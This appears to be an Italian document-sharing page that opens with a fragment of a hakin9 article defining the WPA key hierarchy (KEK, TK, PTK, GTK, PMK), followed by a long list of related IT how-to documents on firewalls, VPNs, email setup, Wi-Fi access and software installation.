durante la Handshake a 4 vie e la Group Key Handshake, KEK (Key Encryption Key 128 bit): Chiave per garantire la segretezza durante la Handshake a 4 vie e la Group Key Handshake, TK (Temporary Key 128 bit): Chiave per la cifratura dei dati (usata per TKIP o CMMP), TMK (Temporary MIC Key 2x64 bit): Chiave per l'autenticazione Handshake a quattro vie per la derivazione della PTK (Pairwise Transient Key) e della GTK (Group Transient Key), Group Key Handshake per il rinnovo della GTK. La derivazione della PMK (Pairwise Master Key) dipende dal metodo di autenticazione usato: se viene usata una PSK (Pre- Shared Key), PMK = PSK. La Fig. 6: Fase 2: Autenticazione 802.1X 20 hakin9 Nº 2/2006

Guida all'installazione (Italiano) Primi passi

Guida all'installazione (Italiano) Primi passi Primi passi Guida all'installazione (Italiano) Siamo lieti che Lei abbia deciso di acquistare il nostro prodotto e speriamo che resterà pienamente soddisfatto del suo nuovo software. In caso di problemi

Dettagli

Proteggiamo il PC con il Firewall di Windows Vista

Proteggiamo il PC con il Firewall di Windows Vista Proteggiamo il PC con il Firewall di Windows Vista Il momento in cui un computer è più a rischio e soggetto ad attacchi informatici, è quando è connesso a internet. Per proteggere il nostro PC ed evitare

Dettagli

Guida di Pro PC Secure

Guida di Pro PC Secure 1) SOMMARIO 2) ISTRUZIONI DI BASE 3) CONFIGURAZIONE 4) INFORMAZIONI AGGIUNTIVE 1) SOMMARIO Guida di Pro PC Secure Pro PC Secure è un programma che si occupa della protezione dagli attacchi provenienti

Dettagli

La VPN con il FRITZ!Box Parte I. La VPN con il FRITZ!Box Parte I

La VPN con il FRITZ!Box Parte I. La VPN con il FRITZ!Box Parte I La VPN con il FRITZ!Box Parte I 1 Introduzione In questa mini-guida illustreremo come realizzare un collegamento tramite VPN(Virtual Private Network) tra due FRITZ!Box, in modo da mettere in comunicazioni

Dettagli

Con accesso remoto s'intende la possibilità di accedere ad uno o più Personal Computer con un modem ed una linea telefonica.

Con accesso remoto s'intende la possibilità di accedere ad uno o più Personal Computer con un modem ed una linea telefonica. Tecnologie informatiche ACCESSO REMOTO CON WINDOWS Con accesso remoto s'intende la possibilità di accedere ad uno o più Personal Computer con un modem ed una linea telefonica. Un esempio di tale servizio

Dettagli

Guida alla configurazione della posta elettronica dell Ateneo di Ferrara sui più comuni programmi di posta

Guida alla configurazione della posta elettronica dell Ateneo di Ferrara sui più comuni programmi di posta Guida alla configurazione della posta elettronica dell Ateneo di Ferrara sui più comuni programmi di posta. Configurazione Account di posta dell Università di Ferrara con il Eudora email Eudora email può

Dettagli

Istruzioni per l installazione del software per gli esami ICoNExam (Aggiornate al 15/01/2014)

Istruzioni per l installazione del software per gli esami ICoNExam (Aggiornate al 15/01/2014) Istruzioni per l installazione del software per gli esami ICoNExam (Aggiornate al 15/01/2014) Il software per gli esami ICON può essere eseguito su qualunque computer dotato di Java Virtual Machine aggiornata.

Dettagli

Consiglio regionale della Toscana. Regole per il corretto funzionamento della posta elettronica

Consiglio regionale della Toscana. Regole per il corretto funzionamento della posta elettronica Consiglio regionale della Toscana Regole per il corretto funzionamento della posta elettronica A cura dell Ufficio Informatica Maggio 2006 Indice 1. Regole di utilizzo della posta elettronica... 3 2. Controllo

Dettagli

VADEMECUM TECNICO. Per PC con sistema operativo Windows XP Windows Vista - Windows 7

VADEMECUM TECNICO. Per PC con sistema operativo Windows XP Windows Vista - Windows 7 VADEMECUM TECNICO Per PC con sistema operativo Windows XP Windows Vista - Windows 7 1) per poter operare in Server Farm bisogna installare dal cd predisposizione ambiente server farm i due file: setup.exe

Dettagli

NOTE OPERATIVE. Prodotto Inaz Download Manager. Release 1.3.0

NOTE OPERATIVE. Prodotto Inaz Download Manager. Release 1.3.0 Prodotto Inaz Download Manager Release 1.3.0 Tipo release COMPLETA RIEPILOGO ARGOMENTI 1. Introduzione... 2 2. Architettura... 3 3. Configurazione... 4 3.1 Parametri di connessione a Internet... 4 3.2

Dettagli

Internet gratuita in Biblioteca e nei dintorni

Internet gratuita in Biblioteca e nei dintorni Internet gratuita in Biblioteca e nei dintorni Per la navigazione è necessaria l iscrizione preventiva in Biblioteca, sia al Servizio Bibliotecario sia a quello internet Per poter accedere a Internet tramite

Dettagli

Guida di Pro Spam Remove

Guida di Pro Spam Remove Guida di Pro Spam Remove 1) SOMMARIO 2) ISTRUZIONI DI BASE 3) CONFIGURAZIONE 4) FILTRO 5) ARCHIVIO E-MAIL 6) NOTE CONCLUSIVE 1) SOMMARIO Pro Spam Remove è un software che si occupa di bloccare tutto lo

Dettagli

Il calendario di Windows Vista

Il calendario di Windows Vista Il calendario di Windows Vista Una delle novità introdotte in Windows Vista è il Calendario di Windows, un programma utilissimo per la gestione degli appuntamenti, delle ricorrenze e delle attività lavorative

Dettagli

SPSS Statistics per Windows - Istruzioni di installazione per (Licenza per utenti singoli)

SPSS Statistics per Windows - Istruzioni di installazione per (Licenza per utenti singoli) SPSS Statistics per Windows - Istruzioni di installazione per (Licenza per utenti singoli) Le seguenti istruzioni sono relative all installazione di SPSS Statistics con licenza per utenti singoli. Una

Dettagli

Visual basic base Lezione 01. L'ambiente di sviluppo

Visual basic base Lezione 01. L'ambiente di sviluppo L'ambiente di sviluppo L'ambiente di sviluppo Visual basic è un linguaggio di programmazione Microsoft. In questo corso prenderemo in considerazione, l'ultima versione. net di questo linguaggio. Microsoft

Dettagli

I M P O S T A R E U N A C C O U N T D I P O S T A C O N M O Z I L L A T H U N D E R B I R D

I M P O S T A R E U N A C C O U N T D I P O S T A C O N M O Z I L L A T H U N D E R B I R D I M P O S T A R E U N A C C O U N T D I P O S T A C O N M O Z I L L A T H U N D E R B I R D C O N F I G U R A R E L A M A I L 1) Aperto il programma, cliccare su strumenti > impostazioni account. 2) Si

Dettagli

Stampe in rete Implementazione corretta

Stampe in rete Implementazione corretta NETWORK PRINT SERVERS Articolo Stampe in rete Implementazione corretta Created: June 3, 2005 Last updated: June 3, 2005 Rev:.0 INDICE INTRODUZIONE 3 INFRASTRUTTURA DELLE STAMPE IN RETE 3. Stampa peer-to-peer

Dettagli

FIRMA DIGITALE RETAIL

FIRMA DIGITALE RETAIL FIRMA DIGITALE RETAIL Guida per l installazione Giugno 2013 Banca Monte dei Paschi di Siena S.p.A. Sommario Avvertenza:... 3 1. FIRMA DIGITALE RETAIL INSTALLAZIONE... 4 Passo 1 installazione del programma

Dettagli

Manuale NetSupport v.10.70.6 Liceo G. Cotta Marco Bolzon

Manuale NetSupport v.10.70.6 Liceo G. Cotta Marco Bolzon NOTE PRELIMINARI: 1. La versione analizzata è quella del laboratorio beta della sede S. Davide di Porto, ma il programma è presente anche nel laboratorio alfa (Porto) e nel laboratorio di informatica della

Dettagli

Come masterizzare dischi con Nero 11

Come masterizzare dischi con Nero 11 Come masterizzare dischi con Nero 11 Non c è dubbio che Nero è diventato un sinonimo di masterizzatore di dischi, data la lunga esperienza sul mercato. Molte persone pensano in questo programma nel momento

Dettagli

Manuale d'uso del Connection Manager

Manuale d'uso del Connection Manager Manuale d'uso del Connection Manager Edizione 1.0 2 Indice Informazioni sull'applicazione Gestione connessioni 3 Operazioni preliminari 3 Aprire l'applicazione Gestione connessioni 3 Visualizzare lo stato

Dettagli

Registratori di Cassa

Registratori di Cassa modulo Registratori di Cassa Interfacciamento con Registratore di Cassa RCH Nucleo@light GDO BREVE GUIDA ( su logiche di funzionamento e modalità d uso ) www.impresa24.ilsole24ore.com 1 Sommario Introduzione...

Dettagli

Indice. Recupero CDDB

Indice. Recupero CDDB Mike McBride Jonathan Singer David White Sviluppatore: Bernd Johannes Wübben Sviluppatore: Dirk Försterling Sviluppatore: Dirk Försterling Revisore: Lauri Watts Traduzione italiana: Giorgio Moscardi Manutenzione

Dettagli

Università Degli Studi dell Insubria. Centro Sistemi Informativi e Comunicazione (SIC) Rete Wireless di Ateneo UninsubriaWireless

Università Degli Studi dell Insubria. Centro Sistemi Informativi e Comunicazione (SIC) Rete Wireless di Ateneo UninsubriaWireless Università Degli Studi dell Insubria Centro Sistemi Informativi e Comunicazione (SIC) Rete Wireless di Ateneo UninsubriaWireless Istruzioni per l accesso alla rete WiFi INSUBRIA CAMPUS STUDENTI Configurazione

Dettagli

Sistema operativo. Sommario. Sistema operativo...1 Browser...1. Convenzioni adottate

Sistema operativo. Sommario. Sistema operativo...1 Browser...1. Convenzioni adottate MODULO BASE Quanto segue deve essere rispettato se si vuole che le immagini presentate nei vari moduli corrispondano, con buona probabilità, a quanto apparirà nello schermo del proprio computer nel momento

Dettagli

1. Il Client Skype for Business

1. Il Client Skype for Business 1. Il Client Skype for Business 2. Configurare una Periferica Audio 3. Personalizzare una Periferica Audio 4. Gestire gli Stati di Presenza 5. Tabella Stati di Presenza 6. Iniziare una Chiamata 7. Iniziare

Dettagli

Laplink FileMover Guida introduttiva

Laplink FileMover Guida introduttiva Laplink FileMover Guida introduttiva MN-FileMover-QSG-IT-01 (REV.01/07) Recapiti di Laplink Software, Inc. Per sottoporre domande o problemi di carattere tecnico, visitare il sito: www.laplink.com/it/support/individual.asp

Dettagli

File, Modifica, Visualizza, Strumenti, Messaggio

File, Modifica, Visualizza, Strumenti, Messaggio Guida installare account in Outlook Express Introduzione Questa guida riguarda di sicuro uno dei programmi maggiormente usati oggi: il client di posta elettronica. Tutti, ormai, siamo abituati a ricevere

Dettagli

Troppe Informazioni = Poca Sicurezza?

Troppe Informazioni = Poca Sicurezza? Troppe Informazioni = Poca Sicurezza? Andrea Pasquinucci Comitato Direttivo AIPSI 19/10/2007 Pag. 1 Informazioni... La Sicurezza non si basa solamente sul nascondere le informazioni Ma quello che vogliamo

Dettagli

VoipExperts.it SkyStone - Introduzione

VoipExperts.it SkyStone - Introduzione VoipExperts.it SkyStone - Introduzione Autore : Giulio Martino IT Security, Network and Voice Manager Technical Writer e Supporter di ISAServer.it www.isaserver.it giulio.martino@isaserver.it Creatore

Dettagli

IT Security 3 LA SICUREZZA IN RETE

IT Security 3 LA SICUREZZA IN RETE 1 IT Security 3 LA SICUREZZA IN RETE Una RETE INFORMATICA è costituita da un insieme di computer collegati tra di loro e in grado di condividere sia le risorse hardware (stampanti, Hard Disk,..), che le

Dettagli

GateManager. 1 Indice. tecnico@gate-manager.it

GateManager. 1 Indice. tecnico@gate-manager.it 1 Indice 1 Indice... 1 2 Introduzione... 2 3 Cosa vi serve per cominciare... 2 4 La Console di amministrazione... 2 5 Avviare la Console di amministrazione... 3 6 Come connettersi alla Console... 3 7 Creare

Dettagli

EW1051 Lettore di schede USB

EW1051 Lettore di schede USB EW1051 Lettore di schede USB 2 ITALIANO EW1051 Lettore di schede USB Contenuti 1.0 Introduzione... 2 1.1 Funzioni e caratteristiche... 2 1.2 Contenuto della confezione... 2 2.0 Installazione del EW1051

Dettagli

Il web server Apache Lezione n. 3. Introduzione

Il web server Apache Lezione n. 3. Introduzione Procurarsi ed installare il web server Apache Introduzione In questa lezione cominciamo a fare un po di pratica facendo una serie di operazioni preliminari, necessarie per iniziare a lavorare. In particolar

Dettagli

su Windows XP con schede Cisco Aironet 350

su Windows XP con schede Cisco Aironet 350 su Windows XP con schede Cisco Aironet 350 WIFE è il servizio gratuito per l'accesso wireless a Internet. Tutti gli studenti in possesso di un computer portatile possono accedere alla rete Internet mediante

Dettagli

Acronis License Server. Manuale utente

Acronis License Server. Manuale utente Acronis License Server Manuale utente INDICE 1. INTRODUZIONE... 3 1.1 Panoramica... 3 1.2 Politica della licenza... 3 2. SISTEMI OPERATIVI SUPPORTATI... 4 3. INSTALLAZIONE DI ACRONIS LICENSE SERVER...

Dettagli

Express Import system

Express Import system Express Import system Manuale del destinatario Sistema Express Import di TNT Il sistema Express Import di TNT Le consente di predisporre il ritiro di documenti, pacchi o pallet in 168 paesi con opzione

Dettagli

La VPN con il FRITZ!Box Parte II. La VPN con il FRITZ!Box Parte II

La VPN con il FRITZ!Box Parte II. La VPN con il FRITZ!Box Parte II La VPN con il FRITZ!Box Parte II 1 Introduzione In questa mini-guida mostreremo com è possibile creare un collegamento su Internet tramite VPN(Virtual Private Network) tra il FRITZ!Box di casa o dell ufficio

Dettagli

Joomla! 2.5:Utenti e permessi - Il wiki di Joomla.it

Joomla! 2.5:Utenti e permessi - Il wiki di Joomla.it Pagina 1 di 6 Joomla! 2.5:Utenti e permessi Da Il wiki di Joomla.it. Traduzione (http://cocoate.com/it/j25it/utenti) dal libro Joomla! 2.5 - Beginner's Guide (http://cocoate.com/j25/users-permissions)

Dettagli

Mac Application Manager 1.3 (SOLO PER TIGER)

Mac Application Manager 1.3 (SOLO PER TIGER) Mac Application Manager 1.3 (SOLO PER TIGER) MacApplicationManager ha lo scopo di raccogliere in maniera centralizzata le informazioni piu salienti dei nostri Mac in rete e di associare a ciascun Mac i

Dettagli

Identità e autenticazione

Identità e autenticazione Identità e autenticazione Autenticazione con nome utente e password Nel campo della sicurezza informatica, si definisce autenticazione il processo tramite il quale un computer, un software o un utente,

Dettagli

FPf per Windows 3.1. Guida all uso

FPf per Windows 3.1. Guida all uso FPf per Windows 3.1 Guida all uso 3 Configurazione di una rete locale Versione 1.0 del 18/05/2004 Guida 03 ver 02.doc Pagina 1 Scenario di riferimento In figura è mostrata una possibile soluzione di rete

Dettagli

su Windows XP con schede D-Link DWL 650+

su Windows XP con schede D-Link DWL 650+ su Windows XP con schede D-Link DWL 650+ WIFE è il servizio gratuito per l'accesso wireless a Internet. Tutti gli studenti in possesso di un computer portatile possono accedere alla rete Internet mediante

Dettagli

Titolare del trattamento dei dati innanzi descritto è tsnpalombara.it

Titolare del trattamento dei dati innanzi descritto è tsnpalombara.it Decreto Legislativo 196/2003 Codice in materia di protezione dei dati personali COOKIE POLICY La presente informativa è resa anche ai sensi dell art. 13 del D.Lgs 196/03 Codice in materia di protezione

Dettagli

RC4 RC4. Davide Cerri. Davide Cerri CEFRIEL - Politecnico di Milano cerri@cefriel.it http://www.cefriel.it/~cerri/

RC4 RC4. Davide Cerri. Davide Cerri CEFRIEL - Politecnico di Milano cerri@cefriel.it http://www.cefriel.it/~cerri/ POLITECNICO DI MILANO CEFRIEL - Politecnico di Milano cerri@cefriel.it http://www.cefriel.it/~cerri/ è un cifrario a flusso progettato da Ron Rivest (la R di RSA) nel 1987. Era un segreto commerciale della

Dettagli

Manuale Utente. Sistema Informativo Ufficio Centrale Stupefacenti

Manuale Utente. Sistema Informativo Ufficio Centrale Stupefacenti Manuale Utente Sistema Informativo Ufficio Sistema di registrazione Registrazione Utenti.doc Pag. 1 di 18 Accesso al sistema Il, quale elemento del NSIS, è integrato con il sistema di sicurezza e di profilatura

Dettagli

Software di interfacciamento sistemi gestionali Manuale di installazione, configurazione ed utilizzo

Software di interfacciamento sistemi gestionali Manuale di installazione, configurazione ed utilizzo 01595 Software di interfacciamento sistemi gestionali Manuale di installazione, configurazione ed utilizzo INDICE DESCRIZIONE DEL SOFTWARE DI INTERFACCIAMENTO CON I SISTEMI GESTIONALI (ART. 01595) 2 Le

Dettagli

Client - Server. Client Web: il BROWSER

Client - Server. Client Web: il BROWSER Client - Server Client Web: il BROWSER Il client Web è un applicazione software che svolge il ruolo di interfaccia fra l utente ed il WWW, mascherando la complessità di Internet. Funzioni principali Inviare

Dettagli

Sophos Computer Security Scan Guida di avvio

Sophos Computer Security Scan Guida di avvio Sophos Computer Security Scan Guida di avvio Versione prodotto: 1.0 Data documento: febbraio 2010 Sommario 1 Software...3 2 Cosa fare...3 3 Preparazione per la scansione...3 4 Installazione del software...4

Dettagli

ATOLLO BACKUP GUIDA INSTALLAZIONE E CONFIGURAZIONE

ATOLLO BACKUP GUIDA INSTALLAZIONE E CONFIGURAZIONE ATOLLO BACKUP GUIDA INSTALLAZIONE E CONFIGURAZIONE PREMESSA La presente guida è da considerarsi come aiuto per l utente per l installazione e configurazione di Atollo Backup. La guida non vuole approfondire

Dettagli

Firewall, Proxy e VPN. L' accesso sicuro da e verso Internet

Firewall, Proxy e VPN. L' accesso sicuro da e verso Internet L' accesso sicuro da e verso Internet L' accesso ad Internet è ormai una necessità quotidiana per la maggior parte delle imprese. Per garantire la miglior sicurezza mettiamo in opera Firewall sul traffico

Dettagli

GUIDA UTENTE WEB PROFILES

GUIDA UTENTE WEB PROFILES GUIDA UTENTE WEB PROFILES GUIDA UTENTE WEB PROFILES... 1 Installazione... 2 Primo avvio e registrazione... 5 Utilizzo di web profiles... 6 Gestione dei profili... 8 Fasce orarie... 13 Log siti... 14 Pag.

Dettagli

Avvio di Internet ed esplorazione di pagine Web.

Avvio di Internet ed esplorazione di pagine Web. Incontro 1: Corso di aggiornamento sull uso di internet Avvio di Internet ed esplorazione di pagine Web. Istituto Alberghiero De Filippi Via Brambilla 15, 21100 Varese www.istitutodefilippi.it Tel: 0332-286367

Dettagli

HORIZON SQL MENU' FILE

HORIZON SQL MENU' FILE 1-1/9 HORIZON SQL MENU' FILE 1 MENU' FILE... 1-2 Considerazioni generali... 1-2 Funzioni sui file... 1-2 Apri... 1-3 Nuovo... 1-3 Chiudi... 1-4 Password sul file... 1-5 Impostazioni... 1-5 Configurazione

Dettagli

Domande frequenti su Phoenix FailSafe

Domande frequenti su Phoenix FailSafe Domande frequenti su Phoenix FailSafe Phoenix Technologies Ltd, leader riconosciuto per la produzione di piattaforme software, strumenti e applicazioni per sistemi strategici di livello mondiale, introduce

Dettagli

IBM SPSS Statistics per Linux - Istruzioni di installazione (Licenza per sito)

IBM SPSS Statistics per Linux - Istruzioni di installazione (Licenza per sito) IBM SPSS Statistics per Linux - Istruzioni di installazione (Licenza per sito) Le seguenti istruzioni sono relative all installazione di IBM SPSS Statistics versione 21 con licenza per sito. Questo documento

Dettagli

Nelle reti di calcolatori, le porte (traduzione impropria del termine. port inglese, che in realtà significa porto) sono lo strumento

Nelle reti di calcolatori, le porte (traduzione impropria del termine. port inglese, che in realtà significa porto) sono lo strumento I protocolli del livello di applicazione Porte Nelle reti di calcolatori, le porte (traduzione impropria del termine port inglese, che in realtà significa porto) sono lo strumento utilizzato per permettere

Dettagli

Servizi di Sicurezza Informatica. Antivirus Centralizzato per Intranet CEI-Diocesi

Servizi di Sicurezza Informatica. Antivirus Centralizzato per Intranet CEI-Diocesi Servizi di Sicurezza Informatica Antivirus Centralizzato per Intranet CEI-Diocesi Messina, Settembre 2005 Indice degli argomenti 1 Antivirus Centralizzato...3 1.1 Descrizione del servizio...3 1.2 Architettura...4

Dettagli

Modulo 4 Il pannello amministrativo dell'hosting e il database per Wordpress

Modulo 4 Il pannello amministrativo dell'hosting e il database per Wordpress Copyright Andrea Giavara wppratico.com Modulo 4 Il pannello amministrativo dell'hosting e il database per Wordpress 1. Il pannello amministrativo 2. I dati importanti 3. Creare il database - Cpanel - Plesk

Dettagli

Biblioteca di Cervia NOZIONI BASE DI INFORMATICA

Biblioteca di Cervia NOZIONI BASE DI INFORMATICA Biblioteca di Cervia NOZIONI BASE DI INFORMATICA NOZIONI DI INFORMATICA Il PC è composto solitamente di tre parti principali: - Il Case, ovvero il contenitore del cuore del computer, da qui si accende

Dettagli

(Tasto Svuota file) Il tasto Svuota file elimina tutti i record presenti nel database.

(Tasto Svuota file) Il tasto Svuota file elimina tutti i record presenti nel database. www.pgx3.it PWX tractor PWX è un software in grado di raccogliere in completa autonomia le informazioni relative alle anagrafiche dei clienti presenti sul Database di Pagine Bianche. PWX vi permette di

Dettagli

Installazione di GFI Network Server Monitor

Installazione di GFI Network Server Monitor Installazione di GFI Network Server Monitor Requisiti di sistema I computer che eseguono GFI Network Server Monitor richiedono: i sistemi operativi Windows 2000 (SP4 o superiore), 2003 o XP Pro Windows

Dettagli

INSTALLAZIONE JOOMLA

INSTALLAZIONE JOOMLA INSTALLAZIONE JOOMLA Moltissime volta mi capita (e penso capiti anche a voi) di dover prima di pubblicare un sito farlo vedere al cliente per l ok finale, o magari doverlo fare vedere, ma non avere ancora

Dettagli

MANUALE EDICOLA 04.05

MANUALE EDICOLA 04.05 MANUALE EDICOLA 04.05 Questo è il video che si presenta avviando il programma di Gestione Edicola. Questo primo video è relativo alle operazioni di carico. CARICO Nello schermo di carico, in alto a sinistra

Dettagli

Schema Tipologia a Stella

Schema Tipologia a Stella Cos'e' esattamente una rete! Una LAN (Local Area Network) è un insieme di dispositivi informatici collegati fra loro, che utilizzano un linguaggio che consente a ciascuno di essi di scambiare informazioni.

Dettagli

Symantec AntiVirus : supplemento per Windows Vista

Symantec AntiVirus : supplemento per Windows Vista Symantec AntiVirus : supplemento per Windows Vista Symantec AntiVirus : supplemento per Windows Vista Il software descritto nel presente manuale viene fornito in conformità a un contratto di licenza e

Dettagli

PROCEDURE DI FIRMA PER I PIP PRESENTATI NEI BANDI APPRENDISTATO

PROCEDURE DI FIRMA PER I PIP PRESENTATI NEI BANDI APPRENDISTATO PROCEDURE DI FIRMA PER I PIP PRESENTATI NEI BANDI APPRENDISTATO 1 - INTRODUZIONE Scopo del presente documento è descrivere le procedure attuabili per la firma dei PIP presentati nei bandi apprendistato

Dettagli

lo 2 2-1 - PERSONALIZZARE LA FINESTRA DI WORD 2000

lo 2 2-1 - PERSONALIZZARE LA FINESTRA DI WORD 2000 Capittol lo 2 Visualizzazione 2-1 - PERSONALIZZARE LA FINESTRA DI WORD 2000 Nel primo capitolo sono state analizzate le diverse componenti della finestra di Word 2000: barra del titolo, barra dei menu,

Dettagli

REVISIONI. 1.0 07 ottobre 2010 RTI Prima stesura

REVISIONI. 1.0 07 ottobre 2010 RTI Prima stesura Data: 07 ottobre 2010 Redatto da: RTI REVISIONI Rev. Data Redatto da Descrizione/Commenti 1.0 07 ottobre 2010 RTI Prima stesura Si precisa che la seguente procedura necessita, nel computer con il quale

Dettagli

Configurare un client di posta per gestire la propria casella di posta elettronica certificata su Aruba

Configurare un client di posta per gestire la propria casella di posta elettronica certificata su Aruba Configurare un client di posta per gestire la propria casella di posta elettronica certificata su Aruba Se non sai di cosa parlo, leggi la premessa, altrimenti vai alla pagina successiva. Premessa. 1.

Dettagli

Cookie. Krishna Tateneni Jost Schenck Traduzione: Luciano Montanaro

Cookie. Krishna Tateneni Jost Schenck Traduzione: Luciano Montanaro Krishna Tateneni Jost Schenck Traduzione: Luciano Montanaro 2 Indice 1 Cookie 4 1.1 Politica............................................ 4 1.2 Gestione........................................... 5 3 1

Dettagli

ELENCO CLIENTI FORNITORI Patch1

ELENCO CLIENTI FORNITORI Patch1 ELENCO CLIENTI FORNITORI Patch1 Il pacchetto P15_200ElencoCF_Patch1.exe contiene una serie di aggiornamenti alla procedura di generazione del file contenente l. Download: 1) Assicurarsi di avere una versione

Dettagli

e quindi di navigare in rete. line può essere limitato a due persone o coinvolgere un ampio numero

e quindi di navigare in rete. line può essere limitato a due persone o coinvolgere un ampio numero Glossario Account (profilo o identità) insieme dei dati personali e dei contenuti caricati su un sito Internet o su un social network. Anti-spyware programma realizzato per prevenire e rilevare i programmi

Dettagli

IBM SPSS Statistics per Windows - Istruzioni di installazione (Licenza per sito)

IBM SPSS Statistics per Windows - Istruzioni di installazione (Licenza per sito) IBM SPSS Statistics per Windows - Istruzioni di installazione (Licenza per sito) Le seguenti istruzioni sono relative all installazione di IBM SPSS Statistics versione 21 con licenza per sito. Questo documento

Dettagli

Istruzioni operative instal azione FirmaVerifica3.0 Pag.1 di 27

Istruzioni operative instal azione FirmaVerifica3.0 Pag.1 di 27 Istruzioni operative installazione FirmaVerifica3.0 Pag.1 di 27 Generalità... 3 Operazioni preliminari... 4 Requisiti tecnici... 5 Installazione applicazione...6 Visualizzazione fornitura... 14 Gestione

Dettagli

Configurazione del Sistema Operativo Microsoft Windows XP per accedere alla rete Wireless dedicata agli Ospiti LUSPIO

Configurazione del Sistema Operativo Microsoft Windows XP per accedere alla rete Wireless dedicata agli Ospiti LUSPIO Configurazione del Sistema Operativo Microsoft Windows XP per accedere alla rete Wireless dedicata agli Ospiti LUSPIO Requisiti Hardware Disporre di un terminale con scheda wireless compatibile con gli

Dettagli

5. Fondamenti di navigazione e ricerca di informazioni sul Web

5. Fondamenti di navigazione e ricerca di informazioni sul Web 5. Fondamenti di navigazione e ricerca di informazioni sul Web EIPASS Junior SCUOLA PRIMARIA Pagina 43 di 47 In questo modulo sono trattati gli argomenti principali dell universo di Internet, con particolare

Dettagli

Wi-Fi, la libertà di navigare in rete senza fili. Introduzione.

Wi-Fi, la libertà di navigare in rete senza fili. Introduzione. Wi-Fi, la libertà di navigare in rete senza fili. Introduzione. L evoluzione delle tecnologie informatiche negli ultimi decenni ha contribuito in maniera decisiva allo sviluppo del mondo aziendale, facendo

Dettagli

Università Degli Studi dell Insubria Centro Sistemi Informativi e Comunicazione (SIC) Rete Wireless di Ateneo UninsubriaWireless

Università Degli Studi dell Insubria Centro Sistemi Informativi e Comunicazione (SIC) Rete Wireless di Ateneo UninsubriaWireless Università Degli Studi dell Insubria Centro Sistemi Informativi e Comunicazione (SIC) Rete Wireless di Ateneo UninsubriaWireless Configurazione con Sistema Operativo Microsoft Windows XP Requisiti di sistema

Dettagli

TRASMISSIONE RAPPORTO ARBITRALE IN FORMATO PDF

TRASMISSIONE RAPPORTO ARBITRALE IN FORMATO PDF TRASMISSIONE RAPPORTO ARBITRALE IN FORMATO PDF Come da disposizioni di inizio stagione, alcune Delegazioni provinciali hanno richiesto la trasmissione dei referti arbitrali solo tramite fax o tramite mail.

Dettagli

ammesso solo con il tuo consenso. Le modifiche apportate hanno lo scopo di semplificare il controllo di quali

ammesso solo con il tuo consenso. Le modifiche apportate hanno lo scopo di semplificare il controllo di quali CHE COSA SONO I COOKIES E COME LI UTILIZZIAMO Un cookie è un semplice file di testo che viene memorizzato sul tuo computer o dispositivo mobile dal server di un sito web e che solo quel server sarà in

Dettagli

FAQ Dell Latitude ON Flash

FAQ Dell Latitude ON Flash FAQ Dell Latitude ON Flash 1. Tutti i computer Dell supportano Latitude ON Flash? No, Latitude ON Flash attualmente è disponibile sono sui seguenti computer Dell: Dell Latitude E4200 Dell Latitude E4300

Dettagli

Guida all installazione di Easy

Guida all installazione di Easy Guida all installazione di Easy ISTRUZIONI PER L INSTALLAZIONE DEL SOFTWARE EASY Requisiti di sistema Sistemi operativi supportati: Windows 2000 Service Pack 4; Windows Server 2003 SP2(consigliato per

Dettagli

Internet Wireless in Biblioteca

Internet Wireless in Biblioteca Sistema Bibliotecario Valle Seriana Internet Wireless in Biblioteca Per poter accedere a Internet tramite il sistema WiFi della Biblioteca connettersi alla rete protetta che si chiama hotspot_biblioteca

Dettagli

GUIDA UTENTE MONEY TRANSFER MANAGER

GUIDA UTENTE MONEY TRANSFER MANAGER GUIDA UTENTE MONEY TRANSFER MANAGER (vers. 1.0.2) GUIDA UTENTE MONEY TRANSFER MANAGER (vers. 1.0.2)... 1 Installazione... 2 Prima esecuzione... 5 Login... 7 Funzionalità... 8 Anagrafica... 9 Registrazione

Dettagli

Utilizzo della Intranet, forum privati Soci e Staff

Utilizzo della Intranet, forum privati Soci e Staff Utilizzo della Intranet, forum privati Soci e Staff Se durante la registrazione ad Associazioni Milano avete fatto richiesta del servizio denominato Intranet, questo sarà subito disponibile già a partire

Dettagli

Manuale per la configurazione di AziendaSoft in rete

Manuale per la configurazione di AziendaSoft in rete Manuale per la configurazione di AziendaSoft in rete Data del manuale: 7/5/2013 Aggiornamento del manuale: 2.0 del 10/2/2014 Immagini tratte da Windows 7 Versione di AziendaSoft 7 Sommario 1. Premessa...

Dettagli

GUIDA UTENTE BILLIARDS COUNTER (Vers. 1.2.0)

GUIDA UTENTE BILLIARDS COUNTER (Vers. 1.2.0) ------------------------------------------------- GUIDA UTENTE BILLIARDS COUNTER (Vers. 1.2.0) GUIDA UTENTE BILLIARDS COUNTER (Vers. 1.2.0)... 1 Installazione Billiards Counter... 2 Primo avvio e configurazione

Dettagli

PROGETTO PER LA TRASMISSIONE DOCUMENTI RELATIVI ALL APPROVAZIONE DELLE MANIFESTAZIONI IN FORMA DIGITALE

PROGETTO PER LA TRASMISSIONE DOCUMENTI RELATIVI ALL APPROVAZIONE DELLE MANIFESTAZIONI IN FORMA DIGITALE PROGETTO PER LA TRASMISSIONE DOCUMENTI RELATIVI ALL APPROVAZIONE DELLE MANIFESTAZIONI IN FORMA DIGITALE L approvazione di una manifestazione nazionale od internazionale comporta spesso la trasmissione

Dettagli

Domande e risposte su Avira ProActiv Community

Domande e risposte su Avira ProActiv Community Domande e risposte su Avira ProActiv Community Avira AntiVir versione 10 sfrutta un innovativa tecnologia protettiva cloud-based, denominata ProActiv, che identifica e blocca i nuovi virus non appena questi

Dettagli

Non sono supportate reti peer to peer, è necessario avere un server dedicato.

Non sono supportate reti peer to peer, è necessario avere un server dedicato. Il software gestionale per le Piccole e Medie Imprese Requisisti hardware e software Sistema operativo Server: NT Server Windows 2000/2003 Server e superiori Novell 3.12 o superiori con supporto nomi lunghi

Dettagli

Usare la webmail Microsoft Hotmail

Usare la webmail Microsoft Hotmail Usare la webmail Microsoft Hotmail Iscriversi ad Hotmail ed ottenere una casella di posta Innanzitutto è necessario procurarsi una casella di posta elettronica (detta anche account di posta elettronica)

Dettagli

Il seguente Syllabus è relativo al Modulo 7, Reti informatiche, e fornisce i fondamenti per il test di tipo pratico relativo a questo modulo

Il seguente Syllabus è relativo al Modulo 7, Reti informatiche, e fornisce i fondamenti per il test di tipo pratico relativo a questo modulo Modulo 7 Reti informatiche Il seguente Syllabus è relativo al Modulo 7, Reti informatiche, e fornisce i fondamenti per il test di tipo pratico relativo a questo modulo Scopi del modulo Modulo 7 Reti informatiche,

Dettagli

I cookie sono classificati in base alla durata e al sito che li ha impostati.

